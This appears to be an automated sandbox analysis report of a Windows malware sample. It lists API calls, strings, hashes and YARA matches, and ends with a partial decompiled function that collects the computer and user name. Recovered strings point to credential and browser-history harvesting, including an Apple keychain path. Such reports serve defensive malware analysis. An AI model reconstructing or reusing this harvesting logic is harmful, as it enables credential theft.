  • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
• _snwprintf.MSVCRT ref: 0040CEFB
• SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040CF60
  • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
  • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
  • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
• _snwprintf.MSVCRT ref: 0040CF26
• wcscat.MSVCRT ref: 0040CF39
Similarity
• API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
• String ID:
• API String ID: 822687973-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75145970,?,00414D8E,?), ref: 00414C81
• malloc.MSVCRT ref: 00414C88
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,75145970,?,00414D8E,?), ref: 00414CA7
• free.MSVCRT(00000000,?,75145970,?,00414D8E,?), ref: 00414CAE
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004153AA
• UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004153CA
• LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 004153D6
• GetLastError.KERNEL32 ref: 004153E4
Similarity
• API ID: File$ErrorLastLockUnlockmemset
• String ID:
• API String ID: 3727323765-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00401B27
  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
• wcslen.MSVCRT ref: 00401B40
• wcslen.MSVCRT ref: 00401B4E
  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
Strings
Similarity
• API ID: wcslen$FolderPathSpecialmemsetwcscatwcscpy
• String ID: Apple Computer\Preferences\keychain.plist
• API String ID: 3183857889-296063946
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004030A6
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 004030C3
• strlen.MSVCRT ref: 004030D5
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004030E6
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040BA78
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,00443980,00000000,00000000,00000000,?,00000000,00000000), ref: 0040BA91
• strlen.MSVCRT ref: 0040BAA3
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040BAB4
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
                                                                                                                                                    • Opcode ID: 75b273bda8818eb1e049dc1d4f8bf93ad7451d7bf5c27d1061f7569d94d81c1b
                                                                                                                                                    • Instruction ID: f1b04ddda804f0d23e85d9b3a1a681265272c1a7bd8491b11875ee0cd1c6d5d4
                                                                                                                                                    • Opcode Fuzzy Hash: 75b273bda8818eb1e049dc1d4f8bf93ad7451d7bf5c27d1061f7569d94d81c1b
                                                                                                                                                    • Instruction Fuzzy Hash: 7CF06DB780022CBEFB059B94DDC9DEB77ACDB04258F0001A2B709E2042E6749F44CB78
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004076CD: memset.MSVCRT ref: 004076EC
                                                                                                                                                      • Part of subcall function 004076CD: GetClassNameW.USER32 ref: 00407703
                                                                                                                                                      • Part of subcall function 004076CD: _wcsicmp.MSVCRT ref: 00407715
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00411794
                                                                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004117A2
                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004117B0
                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 004117B8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 764393265-0
                                                                                                                                                    • Opcode ID: 5fbb731d4b6b530c812bc277fef4d25e3eb5586c38ca31f5bfd49ebc1fc19f48
                                                                                                                                                    • Instruction ID: 4524e9a356975b07e10c0673c8b36924071ef161512cc5bea393be377801c3c3
                                                                                                                                                    • Opcode Fuzzy Hash: 5fbb731d4b6b530c812bc277fef4d25e3eb5586c38ca31f5bfd49ebc1fc19f48
                                                                                                                                                    • Instruction Fuzzy Hash: 9AF0A435100209BBDF112F64DC05BDD3F61AF05B25F104636FA25541F5CF769990D648
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1386444988-0
                                                                                                                                                    • Opcode ID: 5af77e421d670d3e9d53a45b82afc890927493f23d8260cf4e85c54301f9f1bc
                                                                                                                                                    • Instruction ID: 350a086b8d7ad7ad16c9f4c49a9849c7d3de4f0e2d0f3119e9b48998a0ebe44a
                                                                                                                                                    • Opcode Fuzzy Hash: 5af77e421d670d3e9d53a45b82afc890927493f23d8260cf4e85c54301f9f1bc
                                                                                                                                                    • Instruction Fuzzy Hash: 49F0A731680310BBEB70AFA4BD4AF163A919705F57F20043AF644A60E2C7B585558B9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 004048DE
                                                                                                                                                      • Part of subcall function 00412455: LoadLibraryW.KERNEL32(shlwapi.dll,74EB48C0,?,004048E6,00000000), ref: 0041245E
                                                                                                                                                      • Part of subcall function 00412455: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0041246C
                                                                                                                                                      • Part of subcall function 00412455: FreeLibrary.KERNEL32(00000000,?,004048E6,00000000), ref: 00412484
                                                                                                                                                    • GetDlgItem.USER32 ref: 004048F0
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404902
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404914
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$Library$AddressFreeLoadProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2406072140-0
                                                                                                                                                    • Opcode ID: a8f7eca7071bb80bc984f3ec153cc5aff345bc84215bcc68ba7b850d09515bab
                                                                                                                                                    • Instruction ID: 27d5e7a410d711f85fb169ee5f4284aad0304eb1bf7711d039073b83f91ac3c5
                                                                                                                                                    • Opcode Fuzzy Hash: a8f7eca7071bb80bc984f3ec153cc5aff345bc84215bcc68ba7b850d09515bab
                                                                                                                                                    • Instruction Fuzzy Hash: 33F01CB18043026BCB313F72DC09D6FBAADEF84310B010D2EA1D1D61A1CFBE94618A98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0040DA6F
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0040DABB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                                                                    • String ID: <M@
                                                                                                                                                    • API String ID: 909852535-3778786622
                                                                                                                                                    • Opcode ID: 34262e1ccb1ccbcc0d13218f904e640cd746ad35dcac150ad02d22c2cfc9d8bc
                                                                                                                                                    • Instruction ID: 05eea1ce1b03382e5db893e26ff0cd35ef39184770bc15fe2d13ad66f6086966
                                                                                                                                                    • Opcode Fuzzy Hash: 34262e1ccb1ccbcc0d13218f904e640cd746ad35dcac150ad02d22c2cfc9d8bc
                                                                                                                                                    • Instruction Fuzzy Hash: 89518430E003049ADB20AFA5C845F9EB3A5AF44324F51853BF4197B1E2CAB99D89CB5D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • wcschr.MSVCRT ref: 0040BB00
                                                                                                                                                    • wcschr.MSVCRT ref: 0040BB0E
                                                                                                                                                      • Part of subcall function 004080BF: wcslen.MSVCRT ref: 004080DB
                                                                                                                                                      • Part of subcall function 004080BF: memcpy.MSVCRT ref: 004080FE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                                                    • String ID: "
                                                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                                                    • Opcode ID: 8e9dacec36b22f36b3d6a2c9acf4b3c337cfe9fd3fa69281ad6b0cf09b24f830
                                                                                                                                                    • Instruction ID: 425732c6536ade4c189e7d45363e94d8349111ce0189a23fa1b0a907d348dab1
                                                                                                                                                    • Opcode Fuzzy Hash: 8e9dacec36b22f36b3d6a2c9acf4b3c337cfe9fd3fa69281ad6b0cf09b24f830
                                                                                                                                                    • Instruction Fuzzy Hash: D2317E31904204ABDF04EFA5C8419EEB7F8EF44364B20816BE855B72D5DB78AA41CADC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407BD1: SetFilePointer.KERNEL32(00409553,?,00000000,00000000,?,0040935E,00000000,00000000,?,00000020,?,004094E9,?,?,00409553,00000000), ref: 00407BDE
                                                                                                                                                    • _memicmp.MSVCRT ref: 004092A6
                                                                                                                                                    • memcpy.MSVCRT ref: 004092BD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                    • String ID: URL
                                                                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                                                                    • Opcode ID: cd6c5101a0353fed1380e8074d20d0c9319d1f79348dd7d2e07b117509aaf2a7
                                                                                                                                                    • Instruction ID: 33b3fc867a4e2474f07ea88972ed825a8fcb80c5477311fdb059a6d734a7dbfa
                                                                                                                                                    • Opcode Fuzzy Hash: cd6c5101a0353fed1380e8074d20d0c9319d1f79348dd7d2e07b117509aaf2a7
                                                                                                                                                    • Instruction Fuzzy Hash: 8411A031604208BBEB11DF29CC05F5F7BA8AF85348F054066F904AB2D2E775EE10CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                                                    • Opcode ID: 67cc605bc3185a31bfa90e7c216e456876c101feb6316f2713b0a5e7acf2aabe
                                                                                                                                                    • Instruction ID: 0f19ce75f7d61601c6dcaf4457f6717ff276ffca2b35b3dd887d371e09c964f6
                                                                                                                                                    • Opcode Fuzzy Hash: 67cc605bc3185a31bfa90e7c216e456876c101feb6316f2713b0a5e7acf2aabe
                                                                                                                                                    • Instruction Fuzzy Hash: 87117C32908209BEEB10DFE8C9C69AE73A8BB45714F108436ED15E7141D678AA158BA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,00415610,?,00000000), ref: 0041542C
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00415438
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CloseFileHandleUnmapView
• String ID: !-A
• API String ID: 2381555830-3879722540
• Opcode ID: e8c78a8d6966c789a432285f25c1a97e3c9752e60e4576fb47e50e48bcd826d3
• Instruction ID: 6c5ed3bf8746cf55bcd37c1067f9027f6bc59eb5530dee428a664ff8177fa162
• Opcode Fuzzy Hash: e8c78a8d6966c789a432285f25c1a97e3c9752e60e4576fb47e50e48bcd826d3
• Instruction Fuzzy Hash: 5611BF35500B10DFCB319F25E945BD777E0FF84712B00492EE4929A662C738F8C48B48
Uniqueness

Uniqueness Score: -1.00%

APIs
• _snwprintf.MSVCRT ref: 0040BD3E
• _snwprintf.MSVCRT ref: 0040BD5E
  • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
  • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _snwprintf$FileWritewcslen
• String ID: %%-%d.%ds
• API String ID: 889019245-2008345750
• Opcode ID: 0621875c29823bfdd60080e68f211d35d61c8b83eb007e49ef2e77d3973846ff
• Instruction ID: f6bde454874e3f12fe5a715dcb314e2825e8b387052435345983f70e28f49e73
• Opcode Fuzzy Hash: 0621875c29823bfdd60080e68f211d35d61c8b83eb007e49ef2e77d3973846ff
• Instruction Fuzzy Hash: 1D01D871500604BFD7109F69CC82D6AB7F9FF48318B10442EF946AB2A2DB75F841DB64
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _memicmpwcslen
• String ID: History
• API String ID: 1872909662-3892791767
• Opcode ID: bae70ed05e2484058d162cab4743c52f8bd5b62447447ec07eacc4e847ca5ebf
• Instruction ID: 2715e0f5b76d9e8bf3bfa22bf35e41ec2dcc8bed56e6222f305abdff7d2b472d
• Opcode Fuzzy Hash: bae70ed05e2484058d162cab4743c52f8bd5b62447447ec07eacc4e847ca5ebf
• Instruction Fuzzy Hash: 7BF0A4721046029BD210EA299D41A2BB7E8DF813A8F11093FF4D196282DF79DC5646A9
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileNameSavewcscpy
• String ID: X
• API String ID: 3080202770-3081909835
• Opcode ID: 24396636a29f1ce25200a1500eee54acd60350c694163d5da58a3a079e5601d4
• Instruction ID: df6fc214ccc966a4ef74be52ccb1fa8de01b9f2d97edd1d3ec6f174b54628a36
• Opcode Fuzzy Hash: 24396636a29f1ce25200a1500eee54acd60350c694163d5da58a3a079e5601d4
• Instruction Fuzzy Hash: C801E5B1E002499FDF00DFE9D8847AEBBF4AF08319F10402AE815E6280DB78A949CF55
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040AC9A
• SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040ACC9
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: MessageSendmemset
• String ID: "
• API String ID: 568519121-123907689
• Opcode ID: 25315a415076cbab8121a395ef60f2b275a5e49d8e8cab10b2ef02e751b77d98
• Instruction ID: c9b4fa4cd35477e261f68ac5278df415403352ef960fa58aa17ae8539a272808
• Opcode Fuzzy Hash: 25315a415076cbab8121a395ef60f2b275a5e49d8e8cab10b2ef02e751b77d98
• Instruction Fuzzy Hash: 4E01D635800304EBEB20DF5AC841AEFB7F8FF84745F01802AE854A6281D3349955CF79
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowPlacement.USER32(?,?,?,?,?,0040D8F3,?,General,?,?,?,?,?,00000000,00000001), ref: 004017E0
• memset.MSVCRT ref: 004017F3
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: PlacementWindowmemset
• String ID: WinPos
• API String ID: 4036792311-2823255486
• Opcode ID: ebc0bb48f8a97b617363729f7cf0900b593d1d2e388969c7686af9c2b4b0c1d2
• Instruction ID: 403492ab1ae1e8e085d1b686bd15613ed323b870b3f74ac0ef6546771a88dbd4
• Opcode Fuzzy Hash: ebc0bb48f8a97b617363729f7cf0900b593d1d2e388969c7686af9c2b4b0c1d2
• Instruction Fuzzy Hash: BDF0FF71600204ABEB14EFA5D989F6E73E8AF04700F544479E9099B1D1D7B899008B69
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileNameOpenwcscpy
• String ID: X
• API String ID: 3246554996-3081909835
• Opcode ID: 7dbed658630cd8f1005308aafbad7de56d353a569406e82a8f6fc1bcbb586f5c
• Instruction ID: 22468463e432baa7279a8bf0e718ba1534ae3331c134da9758c07f59fbfd6832
• Opcode Fuzzy Hash: 7dbed658630cd8f1005308aafbad7de56d353a569406e82a8f6fc1bcbb586f5c
• Instruction Fuzzy Hash: 6601B2B1D0024CAFCB40DFE9D8856CEBBF8AF09708F10802AE819F6240EB7495458F54
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
• wcsrchr.MSVCRT ref: 0040AB86
• wcscat.MSVCRT ref: 0040AB9C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileModuleNamewcscatwcsrchr
• String ID: _lng.ini
• API String ID: 383090722-1948609170
• Opcode ID: d99e0c1e210eb6d30fbb9606f358fc75cd7c920557a2e7d7f41dfd12b806f831
• Instruction ID: faf96e17328b6cfe7fea8df6c793311bae4d5162fb77f626620ffa022952bc65
• Opcode Fuzzy Hash: d99e0c1e210eb6d30fbb9606f358fc75cd7c920557a2e7d7f41dfd12b806f831
• Instruction Fuzzy Hash: E6C0125394672070F52233226E13B8F17696F22306F60002FF901280C3EFAC631180AF
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
• Opcode ID: 8de3b15170db9a09aff60384115cf250075a5608c27ba135c8b23c8b853ebfd7
• Instruction ID: 8c22702d92a242b4074cdc0308f2d59ea0ad553ae454c6356856be76eef94a8a
• Opcode Fuzzy Hash: 8de3b15170db9a09aff60384115cf250075a5608c27ba135c8b23c8b853ebfd7
• Instruction Fuzzy Hash: 2551A775A0021AFBEF15DF95DC81AEEB775FF04340F54849AF805A6241E7389E50CBA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• wcslen.MSVCRT ref: 00407EF0
  • Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
  • Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
  • Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
• free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
• free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
• memcpy.MSVCRT ref: 00407F5D
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
• Opcode ID: 53bb7909089ec0eedd8dd5e24e0ed79610a14058f15925bc4f6bfad5848592c5
• Instruction ID: 7e4f8ba4ba14ff744b1d1ae1a3210968bf085ae1c99a6b147d894c05d7fb7a00
• Opcode Fuzzy Hash: 53bb7909089ec0eedd8dd5e24e0ed79610a14058f15925bc4f6bfad5848592c5
• Instruction Fuzzy Hash: 9E21AC71504605EFD720DF18C880C9AB7F4EF443247108A2EF866AB6A1D734F916CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                    • Opcode ID: cfaf489efad96e13d7650dd90a1e479029915f4aea12b774901758b52b152337
                                                                                                                                                    • Instruction ID: 8f402eb808e7ad555a909232128954833d185930e872f23c51b71e42452eb786
                                                                                                                                                    • Opcode Fuzzy Hash: cfaf489efad96e13d7650dd90a1e479029915f4aea12b774901758b52b152337
                                                                                                                                                    • Instruction Fuzzy Hash: B121F7B0A017009FD7258F6A8545A52FBE5FF90311B29C9AFE108CBAB2D7B8C800CF15
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,004159A7,000000FF,00000000,00000000,00415592,?,?,00415592,004159A7,00000000,?,00415C14,?,00000000), ref: 00414C2E
                                                                                                                                                    • malloc.MSVCRT ref: 00414C36
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,004159A7,000000FF,00000000,00000000,?,00415592,004159A7,00000000,?,00415C14,?,00000000,00000000,?), ref: 00414C4D
                                                                                                                                                    • free.MSVCRT(00000000,?,00415592,004159A7,00000000,?,00415C14,?,00000000,00000000,?), ref: 00414C54
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                    • Opcode ID: 62b04034a6b45e285efb8e28dd2072d8972627255b60333d693d9c35b4441962
                                                                                                                                                    • Instruction ID: ac963edc179c34f330cc22ede2b288a34a1f5b158d5d5a2152ff40f2e70c1069
                                                                                                                                                    • Opcode Fuzzy Hash: 62b04034a6b45e285efb8e28dd2072d8972627255b60333d693d9c35b4441962
                                                                                                                                                    • Instruction Fuzzy Hash: 9AF0A77220521E3BE61026A55C40D7B778CEB86375B10072BB910E21C1FD59D80006B4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                    control_flow_graph 129 40724c-407395 memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 407397 129->130 131 4073cb-4073ce 129->131 132 40739d-4073a6 130->132 133 4073d0-4073d9 131->133 134 4073ff-407403 131->134 135 4073a8-4073ac 132->135 136 4073ad-4073c9 132->136 137 4073e0-4073fd 133->137 138 4073db-4073df 133->138 135->136 136->131 136->132 137->133 137->134 138->137
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040724C(signed int _a4) {
                                                                                                                                                    				char _v5;
                                                                                                                                                    				char _v6;
                                                                                                                                                    				char _v7;
                                                                                                                                                    				char _v8;
                                                                                                                                                    				char _v9;
                                                                                                                                                    				char _v10;
                                                                                                                                                    				char _v11;
                                                                                                                                                    				char _v12;
                                                                                                                                                    				char _v13;
                                                                                                                                                    				char _v14;
                                                                                                                                                    				char _v15;
                                                                                                                                                    				char _v16;
                                                                                                                                                    				char _v17;
                                                                                                                                                    				char _v18;
                                                                                                                                                    				char _v19;
                                                                                                                                                    				void _v20;
                                                                                                                                                    				long _v24;
                                                                                                                                                    				int _v28;
                                                                                                                                                    				int _v32;
                                                                                                                                                    				void* _v36;
                                                                                                                                                    				void _v291;
                                                                                                                                                    				char _v292;
                                                                                                                                                    				void _v547;
                                                                                                                                                    				char _v548;
                                                                                                                                                    				void _v1058;
                                                                                                                                                    				short _v1060;
                                                                                                                                                    				void _v1570;
                                                                                                                                                    				short _v1572;
                                                                                                                                                    				int _t88;
                                                                                                                                                    				signed int _t91;
                                                                                                                                                    				signed int _t92;
                                                                                                                                                    				signed int _t94;
                                                                                                                                                    				signed int _t96;
                                                                                                                                                    				signed int _t99;
                                                                                                                                                    				signed int _t104;
                                                                                                                                                    				signed short* _t110;
                                                                                                                                                    				void* _t113;
                                                                                                                                                    				void* _t114;
                                                                                                                                                    
                                                                                                                                                    				_t92 = 0;
                                                                                                                                                    				_v20 = 0xa3;
                                                                                                                                                    				_v19 = 0x1e;
                                                                                                                                                    				_v18 = 0xf3;
                                                                                                                                                    				_v17 = 0x69;
                                                                                                                                                    				_v16 = 7;
                                                                                                                                                    				_v15 = 0x62;
                                                                                                                                                    				_v14 = 0xd9;
                                                                                                                                                    				_v13 = 0x1f;
                                                                                                                                                    				_v12 = 0x1e;
                                                                                                                                                    				_v11 = 0xe9;
                                                                                                                                                    				_v10 = 0x35;
                                                                                                                                                    				_v9 = 0x7d;
                                                                                                                                                    				_v8 = 0x4f;
                                                                                                                                                    				_v7 = 0xd2;
                                                                                                                                                    				_v6 = 0x7d;
                                                                                                                                                    				_v5 = 0x48;
